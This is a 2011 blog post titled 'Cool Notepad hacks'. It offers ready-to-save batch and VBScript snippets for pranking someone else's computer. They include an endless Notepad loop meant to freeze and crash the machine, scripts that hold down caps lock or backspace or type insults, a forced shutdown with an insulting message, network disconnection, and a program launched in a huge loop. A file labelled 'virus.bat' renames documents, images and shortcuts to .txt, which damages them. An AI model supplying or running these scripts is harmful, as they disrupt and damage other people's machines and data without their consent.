Sunday, January 30, 2011

Cool Notepad hacks

This will pop up endless notepads until the computer freezes and crashes
Copy the below code in notepad and save it as ".vbs" extension
Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

(======================================================)
CAPS LOCK CRAZY TRICK
Copy the below code in notepad and save it as ".vbs" extension



Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

(======================================================)
UNLIMITED BACKSPACE HACK

This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop



(======================================================)

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

(======================================================)

Convey your friend a message and shut down his / her computer:
Save it as "Anything.BAT" in All Files 

Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

(======================================================)

Disable yor internet temporarily
save it as anything.bat 


code :
ipconfig /release

(======================================================)

Copy the text in a notepad and save it as virus.bat

Dont open file in your own pc 


REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

(======================================================)


Copy the text in a notepad and save it as virus.vbs

code :


Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next


(======================================================)
USE TO SWAP MOUSE BUTTONS
copy it and save it as .bat file format

code :

@ echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------

(======================================================)

thanks if you like i'll post some more cool tricks :)


No comments:

Post a Comment